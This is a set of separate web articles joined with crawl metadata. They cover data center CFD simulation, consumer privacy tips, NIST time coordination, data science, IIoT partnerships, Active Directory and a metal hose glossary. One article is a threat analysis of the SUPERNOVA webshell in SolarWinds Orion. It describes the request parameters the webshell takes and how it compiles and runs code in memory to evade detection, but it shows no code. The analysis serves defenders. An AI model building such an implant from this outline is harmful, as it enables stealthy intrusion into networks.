Several publications on Computational Fluid Dynamics (CFD) Simulation Best Practices have been published in recent years. These suggestions are usually aimed toward CFD simulation analysts with complete control over mesh production and solver options. Nonetheless, users of application-specific software should be aware of a few best practices that will help them succeed. Here’s a quick rundown:
Make Sure Your Setup Is Correct
The urge to press the simulate button is understandable. Remember that considerable simulation power comes with great responsibility. Make sure that geometry, mesh, and initial/boundary conditions are correct, and that your setup is physically and numerically sound. You’ll save a lot of time if you can avoid these early setup mistakes.
Gradually Increase The Level Of Complexity
Breaking down your problem into manageable chunks and gradually increasing simulation complexity is generally beneficial.
Another issue to evaluate is the physical models’ relevance. While it’s understandable to want to get as near to reality as possible, will activating surface tension be feasible when simulating a tens-of-kilometer-long river flow problem?
Make the Most of Your Monitoring Software
Even before you start conducting simulations, you can start optimizing your system. It’s critical to understand how to make the most of the capabilities included in your Computational Fluid Dynamics (CFD) program. Many simulation software packages include built-in features to assist you in diagnosing and improving your simulations on the fly. The simulation monitor gives you useful information on convergence, performance, numerics, and flow characteristics, while the runtime options let you customize your simulation as it runs. When things start to go wrong, keep in mind that these characteristics can save the day.
Enlist The Help of the Experts
Software support exists for a purpose, and any competent Computational Fluid Dynamics (CFD) firm should have a strong support organization. Support engineers are well-versed in the program and can spot obvious flaws or provide innovative solutions to any issues you may be experiencing. They can provide insights into your challenges and provide you with better ways to tackle them because they’ve seen a wide range of applications.
Leave It Alone
Then sit back, relax, and stop fiddling with your simulation while it runs. Constantly tweaking settings mid-run is more likely to spoil your results than to improve them.
Benefits of data center Computational Fluid Dynamics Simulation
As fans age or fail, the airflow over the IT equipment will lessen. This leads to higher temperature differentials between the front and rear of the cabinet.
Insufficient Pressure Differential To Pull Air Through The Cabinet
When there is an insufficient pressure differential between the front and rear of the cabinet, airflow is reduced. The less cold air flowing through the cabinet, the higher the front-to-rear temperature differential becomes.
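The link between airflow and that front-to-rear differential follows from a simple sensible-heat balance. The sketch below uses standard approximations for air (density about 1.2 kg/m³, specific heat about 1005 J/kg·K) and made-up cabinet numbers; it illustrates the principle rather than reproducing any vendor's calculation.

```python
RHO_AIR = 1.2              # kg/m^3, approximate density of air near 25 C
CP_AIR = 1005.0            # J/(kg*K), approximate specific heat of air
CFM_TO_M3S = 0.000471947   # one cubic foot per minute expressed in m^3/s

def front_to_rear_delta_t(it_load_watts: float, airflow_cfm: float) -> float:
    """Approximate temperature rise across a cabinet: dT = P / (rho * V_dot * cp)."""
    mass_flow = RHO_AIR * airflow_cfm * CFM_TO_M3S   # kg/s of air through the cabinet
    return it_load_watts / (mass_flow * CP_AIR)      # rise in kelvin (same size as deg C)

# A 5 kW cabinet: halving the airflow doubles the front-to-rear differential.
print(round(front_to_rear_delta_t(5000, 800), 1))  # ~11.0 C at 800 CFM
print(round(front_to_rear_delta_t(5000, 400), 1))  # ~22.0 C at 400 CFM
```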
Power Usage Effectiveness (PUE)
When this data is combined with the power consumption readings from the in-line power meter, you can safely make adjustments to the data center cooling systems, without compromising your equipment, while instantly seeing the changes in your PUE numbers.
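PUE itself is simply the ratio of total facility power to IT equipment power, so the effect of a cooling adjustment can be checked with arithmetic like the following (the readings are invented for illustration):

```python
def pue(total_facility_kw: float, it_equipment_kw: float) -> float:
    """Power Usage Effectiveness: total facility power divided by IT equipment power."""
    return total_facility_kw / it_equipment_kw

# Invented readings: 100 kW of IT load supported by a 160 kW facility draw gives PUE 1.6;
# trimming cooling so the facility draws 140 kW for the same IT load improves PUE to 1.4.
print(pue(160, 100))  # 1.6
print(pue(140, 100))  # 1.4
```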
ACKP Sensors And Central Monitoring
Wired and Wireless Thermal Map Sensors
Cabinet Analysis and Thermal Map Sensors
Sensors placed in the room or on individual cabinets have traditionally monitored the temperature and humidity within data centers. The Thermal Map sensor, wired or wireless, is a three-in-one sensor that monitors temperature and humidity at the top, middle, and bottom of your server cabinet. It is designed to be installed at the rack’s front air inlet, with a second sensor installed at the rear air outlet.
AKCPro Server is our world-class central monitoring and management software. Suitable for a wide range of monitoring applications. Free to use for all AKCP devices. Monitor your infrastructure, whether it be a single building or remote sites over a wide geographic area. Integrate third-party devices with, Modbus, SNMP, and ONVIF compatible IP cameras.
Monitor all your AKCP devices
All deployed AKCP base units and attached sensors can be configured and monitored from AKCPro Server (APS). Base units communicate with the server through your wired local network (LAN) or wide area network (WAN). Remote sites with no wired network send data to the server through the cellular data network via a VPN connection.
Engineers can use Computational Fluid Dynamics (CFD) simulation to swiftly model a variety of data center architecture configurations. More significantly, it enables a designer to correctly assess the data center’s thermal, airflow, layout, and equipment performance. Correctly defined models and engineering simulation software are powerful tools in the design of future data centers because accurately anticipating a system’s performance gives critical information that feeds into financial considerations such as return on investment and payback.
HVAC Assist, New Zealand, recently completed another installation utilizing the AKCP SP2+ and sensors for monitoring chillers in HVAC systems. In this project, the chiller was recently replaced and a new switchboard installed. The system had an older analogue control system for the central plant, so the SP2+ was deployed to add some intelligence and remote monitoring capabilities to the installation. | <urn:uuid:0df0c4da-4b4b-4b0b-8f67-977a97de5229> | CC-MAIN-2022-40 | https://www.akcp.com/articles/how-computational-fluid-dynamics-simulation-helps-data-center-design/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00741.warc.gz | en | 0.906327 | 1,822 | 2.703125 | 3 |
Personal data privacy IS a part of our everyday life
Last month, I started shopping for a new refrigerator. Why? Because my kids slam the doors on our current one, causing one or both to bounce back open slightly. This has led to prematurely spoiled milk and a freezer full of semi-defrosted food on more than one occasion. Ugh.
As I was browsing online, I was impressed by how far home appliance technology has come.
Your fridge can pretty much replace your iPad. Who couldn’t use a giant Tesla-sized touchscreen built right into the door? What about an integrated webcam that allows you to peek inside your fridge from the grocery store aisle?
It got me thinking about what other kinds of internet-connected tech the average family has in their home. How much sensitive data do those devices collect, store and share about themselves–and your loved ones? And what do companies do with your information?
Today, January 28th is Data Privacy Day, a day dedicated to raising awareness amongst business owners and promoting privacy and data protection best practices. Since it started in 2007, the focus of DPD has also expanded to include education for families and consumers about how to protect their personally identifiable information online and in social networking.
A topic of hot discussion lately is how tech giants like Facebook, Google, and Apple protect our PII–and how they are monetizing that sensitive and private data for their benefit (but not ours). New privacy regulations are likely on the horizon, but it may be a very long time before we see any meaningful reforms.
So we wait. But not idly.
Unfortunately, our personal data is less private than we think. We can and should take steps to minimize what others can find about us online. By taking action now, we can stop the bleeding of private data to 3rd parties, and even begin to clean-up what is already out there about us.
Follow the steps later in this guide to fairly quickly and easily:
- Lockdown your sensitive data
- Secure your internet communications
- Limit what information is collected about you online
- Limit the sharing of personal data with 3rd parties
- Opt-out of targeted advertising
- Remove personally identifiable information (PII) from public records
If you don’t take these actions to secure your data privacy, you’re at an increased risk of identity theft, surveillance, and eavesdropping. Nowadays, private conversations can be recorded by voice assistants. Webcams can be hacked and used as spies or for blackmail. And emails and login details can be leaked in data breaches and reused by 3rd party attackers.
You might be wondering, if the security and data privacy risks are so great if we get this wrong, then why isn’t all of our secure data locked down by default?
And the answer is that as a society, we’ve traded our privacy for convenience. Today’s cloud-enabled apps, voice assistants, and smart homes all present an irresistible value proposition. The promise of speed, convenience, and easy access to information. The automation of mundane tasks and getting fast answers to complex questions.
But to make these services work effectively, they need to know a lot about us so they can tailor our experience. For example, how to distinguish your voice from that of your significant other, or kids. Where you live, work, eat and shop so it can make intelligent recommendations. What’s your schedule, habits, and preferences so it can predict what you might need. All down to the details like how warm you like to keep your house. How cold you like to keep your milk, and so on.
The more cloud services and websites know about you, and other users like you, the better they get at predicting new behaviors. Predictive AI is an advertiser’s gold mine. If they know what you like, and can predict what you might do (click an ad, start a trial), they know exactly what to serve you to trigger a purchase. Facebook ads are a great example. The reason they’re so effective and powerful is that they’re so finely tuned and targeted based on hoards of personal data.
In our daily lives, each of us has to decide where to strike the right balance between convenience and privacy. It’s a personal decision. The best advice we can give is to carefully consider the tradeoffs before you hand over any personal information. Make sure the juice is worth the squeeze.
Where to start with data privacy
It’s smart to take a good long look at what you’re doing today that might be unknowingly sabotaging your privacy. For my action-oriented friends out there, does this sound like you?
- You breeze through the setup menu when installing new software, clicking ‘Accept’ on every screen.
- You install new mobile apps often, without a 2nd thought about the permissions the app asks for (e.g. location, contacts, microphone access, or the ability to “read and change data on your screen”).
- You’ve got tons of old accounts with websites you don’t use anymore.
- Speed, convenience, and ease are paramount. Your focus is on getting things done right now, and you don’t worry much about what may or may not happen later.
If you said yes to any of these, start with the following:
- When installing software, if given an option, DON’T grant permission to “send anonymous [device, user and/or performance] data to help us improve our products and services”. This is often a step in the software installation wizard, or an admin setting you can disable from the app’s settings menu once installed.
- Remember that anonymous data isn’t ever totally anonymous. Even though a company may claim that the data they gather about you is de-personalized or anonymized, with enough attention and skill, it can usually be cross-matched with other data sets such as location, IP address, etc. to infer who you are.
- Review app permissions before downloading. Ensure they are reasonable, and limited to the lowest level possible that allows the app to function. For example, if a mobile restaurant app needs your current location to show you nearby restaurants, can you limit the access to “Share my location only while using the app”? Or deny location data access altogether, and instead type in your zip code or pinch & zoom on a map to find nearby restaurants? Be very careful with apps that need to access your device’s storage, microphone, camera, or need the ability to “read and change data on your screen”.
The less information is stored about you online, including on sites you no longer use, the lower your chances are of having it exposed in a breach or sold to data brokers or advertisers.
When installing apps, make sure any high-risk permissions requested are required and reasonable for the app to work; and that the app fulfills an important enough role for you that it’s worth the extra privacy and security risks.
But what if I already do all that?
Now, if you’re like me and consider yourself a fairly careful and detail-oriented person, you might be thinking you’re less at risk because:
- You actually read contracts before signing them.
- You also read the fine print, even though it’s sometimes confusing and full of jargon.
- You’re cautious about what you say and do online, because you know digital is forever, and don’t want to be a front-page headline.
- You care about the ethics and morality of the companies you do business with.
But we can ALWAYS step up our game. Here are a few examples to take it to the next level:
- Never blindly accept cookies on websites. Always see which you can opt-out of (ex: advertising or performance cookies) by clicking to learn more and unchecking available options.
- Take security and privacy checkups on key sites that offer them. According to Financial Times, less than 10% of Google users, and probably closer to 1%, actually change their privacy settings. If you have a Google account, I recommend their Privacy Checkup Wizard and would encourage you to use it. Facebook, LinkedIn, Dropbox, Microsoft, and others also offer simple guides that walk you through privacy settings and make it easy to toggle them on and off.
- Remember that software is created by humans, and humans are not perfect. Even if a site claims to not sell or share your personal data, or use it for any purpose other than delivering the products and services you requested—there can be human errors, software bugs, or hacks that allow private data to inadvertently be shared with outside parties. It’s why it’s a good idea not to store payment information or other sensitive data on a website, but instead to keep it handy by storing that data securely in a password manager.
This all sounds complicated. How do I make protecting data privacy easy?
Most of what we’ve covered so far are behavioral changes that can help you limit what private data is gathered or shared about you, and minimize the potential harm or hassle it can cause. But all of these require an investment of time and effort on your part and let’s face it, we’re all really busy. Here are a few quick actions and simple tools that will help secure your communications.
First and foremost, use common sense.
If you’re worried about whether your Alexa device is spying on you, mute your microphone and cover the camera. Invest in a couple of laptop webcam covers (or comment below and we’ll mail you some!), and don’t be afraid to unplug or power down devices if you even suspect they might be compromised. When you install new devices like a network router, always change default passwords and review the security settings menu to dial up your protections.
Use a Personal VPN service.
A VPN is a virtual private network that encrypts all internet communication to and from your devices and the online services you use. VPNs prevent hackers and 3rd parties from spying on you while connected to public or untrusted Wi-Fi and ensure your web traffic can’t be intercepted or manipulated by others. While we don’t resell VPN services directly, we do have a relationship with ExpressVPN, and you can learn more about their services and pricing here.
Protect all your internet-connected devices with a smart firewall and WiFi mesh system.
Today’s homes are full of dumb “smart” things. Unlike computers which run very sophisticated operating systems, voice assistants, doorbell cameras, and internet-connected appliances are all comparatively “dumb”. There’s often a very basic user interface, and no capacity to run any kind of antivirus software or manage data privacy, data collection, or user permissions.
These devices generally function by receiving and relaying commands to and from the vendor’s central cloud servers. And because they can be remotely told what do to, they are highly susceptible to remote takeover attempts by rogue devices on the internet.
Your best approach to keep them clean and safe is to put them behind a network firewall that can screen and block rogue connection requests. A smart firewall from eSilo is one way to get this type of protection for everything inside your home, with a simple plug-n-play setup. Each device also comes with a subscription for remote security monitoring services.
Lastly, train your family and staff on good data security practices.
It’s easy to forget how critical our “human firewall” is to avoiding cyberattacks and privacy breaches. The more they know, the smarter they’ll be. It’s always a good idea to do annual security awareness training, and then reinforce that learning with short explainer videos. We’re offering free access to eSilo’s video training platform, where you can find over 20 1-minute videos on a variety of security, privacy, and online safety topics. You can create an account for FREE here.
Looking back over the past 5 to 10 years, it’s amazing how much new technology we’ve added into our homes and can now carry around in our pockets. But it’s also a little worrisome. The average person knows so little about how to protect their personal data security, and what the companies who provide this tech do to protect their privacy.
Every time we create an online account, download an app or install a piece of software, we’re giving away little bits of information about ourselves. Those bits add up over time and can be stitched together to create a frighteningly accurate picture of who we are, what we do, why we buy, and how we think and act. This is why data brokers make so much money gathering and selling our personal data.
But the good news is that the situation is far from hopeless. The more we collectively understand how our private data is gathered and used, and consciously decide what we are and aren’t comfortable with, the easier it becomes to lockdown the things we don’t like, and to walk away from vendors who can’t, or choose not to, handle our data securely. | <urn:uuid:150e6b83-cc79-48b9-9b7a-3ef7d14bda61> | CC-MAIN-2022-40 | https://www.esilo.com/blog/personal-data-privacy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00741.warc.gz | en | 0.924775 | 3,025 | 2.671875 | 3 |
International time coordination is improving throughout the Americas, thanks to a low-cost system relying on GPS satellites and the Internet, which enables much faster time comparisons and gives small countries the opportunity to evaluate easily their measurements in relation to others and to world standards, according to the National Institute of Standards and Technology (NIST).
The time and frequency network of the Sistema Interamericano de Metrologia (SIM), or Inter-American Metrology System, began operation in 2005. The system includes national metrology institutes in member nations of the Organization of American States (OAS). The SIM network currently compares time and frequency measurements made in Brazil, Canada, Mexico, Panama and the United States. Costa Rica and Colombia are expected to join the network soon, says the NIST statement, and additional OAS members have expressed interest.
As the U.S. civilian timekeeper, the NIST participates in the SIM network and also calibrates other members’ equipment, which consists of a computer-based measurement system and a GPS receiver provided by OAS. Institutes simultaneously compare their time scales to clocks on the same GPS satellites, and then automatically compare their results over the Internet. Time differences can be viewed on the Web by all laboratories in the network, with updates every 10 minutes.
“Canada, Mexico and the United States now have better time coordination than ever before,” said Mike Lombardi, an NIST scientist who is a member of the SIM working group on time and frequency. The three countries’ times remained within 50 nanoseconds of each other for an eight-month period in 2006, according to a recent status report from NIST officials. Measurement precision is good enough to calibrate the best regional standards.
The Science behind Big Data
Every day, the amount of information available to solve some of society’s most vexing problems grows exponentially. By 2020, the amount of data in the digital universe will grow ten-fold.
"Big Data only becomes truly powerful when it is compiled, sorted, analyzed and manipulated -when it is translated into the language of business leaders and policymakers"
But for all its potential, data alone won’t change the way we distribute innovations, administer healthcare, conduct business or operate in the global economy. Data in its raw form is nothing but untapped potential.
Big Data only becomes truly powerful when it is compiled, sorted, analyzed and manipulated, that is, when it is translated into the language of business leaders and policymakers. And so the explosion of data has driven the emergence of fields built for the sole purpose of making data usable.
Today, we see entire disciplines and areas of business that have been born of the need to glean insights from vast amounts of, otherwise, indecipherable information. In particular, a new profession of Data Scientists has emerged to meet this growing need to bring structure to large quantities of formless data.
The job is still in its relative infancy; the term “Data Scientist” was first coined in 2008 by the leaders of data analytics at LinkedIn and Facebook. Even so, in seven short years the profession has exploded.
In 2012, Harvard Business Review named the position “the sexiest job of the 21st century.” This year it was Mashable’s hottest profession. With acknowledgments like that, it should come as no surprise that students with master’s degrees or PhDs, but no work experience, often come out of graduate school and receive six-figure salaries. Experienced data scientists are commonly paid similarly to senior business executives.
Those salaries aren’t without warrant. Data science is now an essential business tool. According to recent research from Accenture, 87 percent of companies agree. They believe that within three years, big data analytics will redefine their respective industries and are spending on it, accordingly. In fact, 73 percent of enterprises are spending more than a fifth of their technology budget on analytics.
Moreover, there is a shortage of qualified scientists to fill this growing demand. Companies are finding themselves expanding the search for talent to physics, engineering, and applied mathematics majors, but that requires significant testing and screening to ensure candidates can adapt to the rigorous requirements of the data science field.
But why exactly does a Data Scientist need these skills? What exactly does a Data Scientist do? And what sets this profession apart from the more established mathematicians and statisticians?
The big difference is a Data Scientist’s ability to think like a business person: they not only parse through vast and varied banks of data, but also relay findings clearly to decision makers. As the industry defines it, data scientists have “the ability to communicate findings to business and IT leaders in a way that can influence how organizations approach business challenges.”
Another big difference is the number of highly technical and quantitative skills needed to be successful. There is the highest demand for machine learning skills, Python and Java development skills, open source analytics and data management.
At Experian, we are investing substantial time and resources into this burgeoning field.
We have years of experience harnessing the power of data. In fact, we have been gleaning insights from information to help our customers since before big data became a buzz word. Today, we are still using data assets to improve society. We are helping consumers, financial institutions, healthcare organizations, automotive companies, retailers and governmental organizations make more informed and effective decisions.
And we are committed to developing data science to improve our business. Our Data Labs are a prime example. These are staffed by teams of scientists with experience in stats and analytics. The unique combination of skills allows our labs to consider problems in new ways and identify previously undetected strategies. By analyzing billions of transactions and records, the Data Labs teams are improving the economy by solving strategic marketing and risk-management problems.
The future is bright and there’s still more we can do with data to drive growth and improve national policies. We’re working with the health care industry and others, from energy to automotive to the multi-family housing community and government to fully leverage data. But to do so we will need more individuals capable of interpreting data.
Going forward, data scientists will prove instrumental in using data for good. | <urn:uuid:51357a50-55f1-402c-800b-2dc3b78e7a85> | CC-MAIN-2022-40 | https://softwaretesting.cioreview.com/cxoinsight/the-science-behind-big-data-nid-17661-cid-112.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00741.warc.gz | en | 0.941234 | 905 | 2.890625 | 3 |
An analysis reports the detection of a backdoor possibly developed by the unidentified hacking team involved in the attack; known as Supernova, this is a web shell injected into SolarWinds Orion code that would allow threat actors to execute arbitrary code on systems that use the compromised version of the product.
A webshell is typically malware logic embedded in a script page and is most often implemented in an interpreted programming language or context (commonly PHP, Java JSP, VBScript and JScript ASP, and C# ASP.NET).
The webshell will receive commands from a remote server and will execute in the context of the web server’s underlying runtime environment.
The SUPERNOVA webshell is also apparently designed for secondary or upgraded persistence, but its novelty goes far beyond the conventional webshell malware.
SUPERNOVA takes a valid .NET program as a parameter. The .NET class, method, arguments and code data are compiled and executed in memory. There is no need for additional network callbacks other than the initial C2 request.
The attackers have built a silent and full-grown .NET API embedded in an Orion binary, whose user is typically highly privileged and positioned with a high degree of visibility within an organization’s network.
The attackers can then arbitrarily configure SolarWinds (and any local operating system feature on Windows exposed by the .NET SDK) with malicious C# code. The code is compiled on the fly during benign SolarWinds operation and is executed dynamically.
By leveraging the inbuilt trust of system administrators and routine tool patching, the webshell was implanted without raising any conventional alerts.
The implant itself is a trojanized copy of app_web_logoimagehandler.ashx.b6031896.dll, which is a proprietary SolarWinds .NET library that exposes an HTTP API. The endpoint serves to respond to queries for a specific .gif image from other components of the Orion software stack.
The four parameters (codes, clazz, method and args) are passed via the GET query string to the trojanized logo handler component.
These parameters are then executed in a custom method that simply invokes the underlying operating system.
The attacker might send a request to the embedded webshell over the internet or through an internally compromised system.
The code is crafted to accept the parameters as components of a valid .NET program, which is then compiled in memory. No executable is dropped and thus the webshell’s execution evades most defender endpoint detections.
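Because the webshell rides on ordinary-looking HTTP GET requests, one practical hunting approach is to search web server logs for requests to the logo handler that also carry the four parameters described above. The sketch below is an illustrative example only; the log path is a placeholder, IIS field layouts vary, and this is not taken from the original researchers' detection logic.

```python
import re

LOG_FILE = r"C:\inetpub\logs\LogFiles\W3SVC1\u_ex201214.log"  # placeholder IIS log path
SUSPICIOUS = re.compile(r"logoimagehandler\.ashx.*(codes|clazz|method|args)=", re.IGNORECASE)

# Print any request line that hits the trojanized handler with SUPERNOVA-style parameters.
with open(LOG_FILE, errors="ignore") as handle:
    for line in handle:
        if SUSPICIOUS.search(line):
            print(line.strip())
```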
Tactics, Techniques and Procedures
The malware is secretly embedded onto a server, and then receives C2 signals remotely and executes them in the context of the server user.
Yet SUPERNOVA is notable for its in-memory execution, the sophistication of its parameter handling and execution, and the flexibility it gains by implementing a full programmatic API to the .NET runtime.
Apart from eluding detections, the SolarStorm actors were skilled enough to purposely hide their traffic and behaviour in plain sight and to avoid leaving trace evidence behind.
According to the researchers, only by organizing multiple security appliances and applications in a single pane can defenders detect these attacks.
Palo Alto Networks customers are protected by the following:
- Endpoint protection through Cortex XDR.
- Malware sandbox detection through WildFire (Next-Generation Firewall security subscription).
- An array of defenses including IPS and AppID in Threat Prevention (Next-Generation Firewall security subscription).
- Threat intelligence with Cortex Data Lake.
- Network defense orchestration with Cortex XSOAR.
What’s happening in the manufacturing industry right now is similar to what’s happening to many other industries: technology is moving too fast for humans to keep up with it. The promise of the Industrial Internet of Things (IIoT) is huge. Companies, in theory, have the potential to automate, calibrate, create, and distribute their goods while amassing tons of data to keep doing it better and faster. Still, according to research from IBM, a single manufacturing site can generate 2,200 terabytes of data in a single month, but most of that data goes unanalyzed. Most manufactures lack the necessary infrastructure—or organizational structure—to harness its value.
What we’re seeing with the IIoT is akin to what we’re seeing in other industries seeking to implement automation and AI into their processes. Most of the companies using the IIoT are still using just a fraction of what AI and machine learning are able to offer. What’s more, they’re doing it in smaller, more confined departments and business units, rather than using that data at scale. To do so would require stronger, more connected systems, and honestly a whole different way of seeing one’s enterprise structure.
What’s the IIoT—and How Is It Being Used Now?
The IIoT is a loose term for the industrial and manufacturing industries’ use of the Internet of Things. It isn’t so much one singular network as a wide ecosystem of separate companies using sensors and connectivity to glean more data/insights/safety from their manufacturing activities.
Everything at some point is manufactured. Cars, chips, clothes, planes, food packaging, electronics, etc. You name it, it’s been manufactured. But so many of these companies, especially in industries stuck in legacy thinking like industrial machinery and aerospace, have been slow to adopt new technologies.
Up until now, the IIoT has been used for things like automation, predictive maintenance, and injury prevention—simple things that help keep companies running more safely and efficiently. But these are not necessarily the “a-ha” moments AI and machine learning have promised in terms of bringing value to the enterprise.
Why is that? There are a couple main reasons. The first is that most companies simply don’t have a cohesive infrastructure in place to harness AI for all its worth. As far as we’ve come in digital transformation, most companies still have a mish-mash of systems and stacks working together—and every system is only as strong as its weakest part.
The second reason, and arguably just as important, is that we as humans simply aren’t there yet. It’s hard for us to “think” like AI. Therefore, it’s hard for us to envision how to put those systems in place so that they will work at their fullest capacity. This means not just which software to buy and which infrastructure to build, but how to organize our workflows and enterprise systems in such a way that they work seamlessly together. Rather than thinking in terms of a single segment of a company’s IIoT, the company itself needs to operate as a finely tuned IIoT in itself, with all team members, visionaries, developers, etc., working together to maximize technology’s potential. The hard thing about this: there is no template for it. Every company is different. Which is why it’s taking so long for all of us—in general—to get out the kinks.
Maximizing the IIoT: Innovation Through Strategic IT/OT Partnerships
At least on the tech side, hope is coming. As noted above, to be truly effective, manufacturing needs better technology for data processing and luckily, big tech is stepping up to offer them what they need. For instance, just recently, Siemens, IBM, and Red Hat announced a collaboration that would allow IIoT users to use a hybrid cloud solution to maximize their efforts. This collaboration would extend the deployment and flexibility of MindSphere, the IIoT solution created by Siemens, to be used on-premises and with the cloud. Why does it matter? Because the faster the data is able to be processed, the faster the insights can be utilized for better cost, safety, and time savings. Edge computing, AI, and better storage solutions are necessary for the speed and agility required to process data in real time. Being able to enjoy either on-site or cloud analytics is a huge boost for IIoT users.
They aren’t the only collaboration in the past year to make a difference. In October 2020, Honeywell and Microsoft announced a partnership that would build its domain specific applications on Microsoft Azure to drive new levels of productivity for industrial clients delivering more efficiency, simplicity, and better insights into managing processes. Honeywell, which may be best known for its industrial roots, is a perfect example of the converging forces that are bringing legacy industrial businesses into the modern IT era. With its Forge solutions now in market, Honeywell has transformed its business to be more IT centric focusing on SaaS, Big Data, and enterprise performance management (EPM) through a technology centric lens.
The IIoT is set to become a $263+ billion industry by 2027. Still, the fact that manufacturing has agreed to invest in the IIoT is not a guarantee that it will bring value to every company using it. The responsibility of that is not on big tech, it’s on the industry as a whole to reimagine what manufacturing and industrial revolution really look like—not just in terms of robots and automation, but in terms of business structure and business models. When we as humans finally get a handle on that side of the equation, I believe technology will be even better suited to helping us get the job done.
Futurum Research provides industry research and analysis. These columns are for educational purposes only and should not be considered in any way investment advice.
The original version of this article was first published on Forbes.
Daniel Newman is the Principal Analyst of Futurum Research and the CEO of Broadsuite Media Group. Living his life at the intersection of people and technology, Daniel works with the world’s largest technology brands exploring Digital Transformation and how it is influencing the enterprise. From Big Data to IoT to Cloud Computing, Newman makes the connections between business, people and tech that are required for companies to benefit most from their technology projects, which leads to his ideas regularly being cited in CIO.Com, CIO Review and hundreds of other sites across the world. A 5x Best Selling Author including his most recent “Building Dragons: Digital Transformation in the Experience Economy,” Daniel is also a Forbes, Entrepreneur and Huffington Post Contributor. MBA and Graduate Adjunct Professor, Daniel Newman is a Chicago Native and his speaking takes him around the world each year as he shares his vision of the role technology will play in our future. | <urn:uuid:b2c74b4a-0b32-4415-83c7-6afb6dddd182> | CC-MAIN-2022-40 | https://convergetechmedia.com/how-tech-partnerships-are-driving-the-expansion-of-the-industrial-iot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00141.warc.gz | en | 0.950063 | 1,446 | 2.6875 | 3 |
Active Directory (AD) is Microsoft's directory service for operating systems of the Windows Server family. Active Directory allows administrators to use group policies to ensure consistency in customizing the user work environment, including centrally installing and updating software on multiple computers. At the same time, Active Directory networks can contain up to several million objects. In addition to storing information about directory service objects and groups in a centralized database, Active Directory can act as a unified authorization system for many applications. It can also be integrated with other authorization services.
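As a minimal sketch of that unified-authorization role, an application can validate a user's credentials against Active Directory over LDAP. The example below uses the Python ldap3 library; the domain controller, domain, and account names are placeholders.

```python
from ldap3 import Server, Connection, NTLM

# Placeholder names: replace the domain controller, domain, and account with real values.
server = Server("dc01.example.local")
conn = Connection(server, user="EXAMPLE\\jdoe", password="s3cret", authentication=NTLM)

if conn.bind():
    print("Credentials accepted by Active Directory")
    conn.unbind()
else:
    print("Authentication failed:", conn.result.get("description"))
```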
Abrasion: External damage to a hose assembly caused by its being rubbed on a foreign object.
Ambient or Atmospheric Conditions: The surrounding conditions, such as temperature, pressure and corrosion, to which a hose assembly is exposed.
Amplitude of Vibration and/or Lateral Movement: The distance a hose assembly deflects laterally to one side from its normal position, when this deflection occurs on both sides of the normal hose centerline.
Anchor: A restraint applied to a pipeline to control its motion caused by thermal growth.
Annular: Refers to the convolutions on a hose that are a series of complete circles or rings located at right angle to the longitudinal axis of the hose (sometimes referred to as bellows).
Application: The service conditions that determine how a metal hose assembly will be used.
Armor or Casing: Flexible interlocked tubing placed over the entire length or in short lengths at the end of a metal hose to protect it from physical damage and to limit the bending radius.
Attachment: The method of fixing end fittings to flexible metal hose-welding, brazing, soldering, swaging or mechanical.
Axial Movement: Compression or elongation of the hose along its longitudinal axis.
Basket Weave: A braid pattern in which the strands of wire alternately cross over and under two braid bands (two over – two under).
Bend Radius: The radius of a bend measured to the hose centerline.
Braid: A flexible wire sheath surrounding a metal hose that prevents the hose from elongation due to internal pressure. Braid is composed of a number of wires wrapped helically around the hose while at the same time going under and over each other in a basket weave fashion.
Braid Angle: The acute angle formed by the braid strands and the axis of the hose.
Braid Construction: Term applies to description of braid, i.e., 36 x 8 x .014, 304L SS.
- 36 = number of carriers or bands in a braid
- 8 = number of wires on each carrier
- .014 = wire diameter in inches
- 304L = material, Type 304L stainless steel
Braid Sleeve, Braid Band or Ferrule: A ring made from tube or metal strip placed over the ends of a braided hose to contain the braid wires for attachment of fittings.
Braid Wear: Motion between the braid and corrugated hose which normally causes wear on the O.D. of hose.
Braided Braid: In this braid, the strands of wire on each carrier of the braiding machine are braided together, and then braided in normal fashion, hence the term braided braid.
Brazing: A process of joining metals using a non-ferrous filler metal, which melts above 800°F, yet less than the melting of the “parent metals” to be joined.
Butt Weld: A process in which the edges or ends of metal sections are butted together and joined by welding.
Casing: (See definition under Armor)
Controlled Flexing: Controlled flexing occurs when the hose is being flexed regularly, as in connections to moving components.
Examples: Platen presses, thermal growth in pipe work.
Convolution: The annular or helical flexing member in corrugated or strip wound hose.
Corrosion: The chemical or electro-chemical attack of a media upon a hose assembly.
Cycle-Motion: The movement from normal to extreme position and return.
Developed Length: The length of a hose plus fitting (overall) required to meet the conditions of a specific application.
Diamond Weave: A braid pattern in which the strands alternately cross over one and under one of the strands (one over – one under). Also known as plain weave.
Dye Penetrant Inspection or Test: A method for detecting surface irregularities, such as cracks, voids, porosity, etc. The surface to be checked is coated with a red dye that will penetrate existing defects. Dye is removed from surface and a white developer is applied. If there is a defect in the surface being checked, the red dye remaining in it causes the white developer to be stained, thereby locating the defective area.
Displacement: The amount of motion applied to a hose defined as inches for parallel offset and degrees for radial misalignment.
Dog-Leg Assembly: Two hose assemblies joined by a common elbow.
Duplex Assembly: An assembly consisting of two hose assemblies – one inside the other – and connected at the ends.
Effective Thrust Area – Hose and Bellows: The cross-sectional area described by the outside diameter (at the tops of the convolutions) less two times the metal thickness of the hose or bellows.
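As a rough worked example of this definition (a sketch only; the diameter, wall thickness and pressure figures below are invented, and manufacturers publish exact effective areas for their products):

```python
import math

def effective_thrust_area(outside_diameter, metal_thickness):
    """Effective thrust area per the definition above: the circular area whose
    diameter is the O.D. over the convolutions minus two times the metal thickness."""
    effective_diameter = outside_diameter - 2 * metal_thickness
    return math.pi * effective_diameter ** 2 / 4

# Hypothetical 2 in. O.D. hose with a 0.020 in. wall, pressurized to 150 PSI.
area = effective_thrust_area(2.0, 0.020)   # square inches
thrust = 150 * area                         # pressure x effective area = axial thrust, lb
print(f"Effective area: {area:.2f} sq in, pressure thrust at 150 PSI: {thrust:.0f} lb")
```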
Elastic Radius (Intermittent Flexure): The smallest radius that a given hose can be bent to without permanent deformation of the metal in its flexing members (convolutions or corrugations).
Erosion: The wearing away of the inside convolutions of a hose caused by the flow of the media conveyed, such as wet steam, abrasive particles, etc.
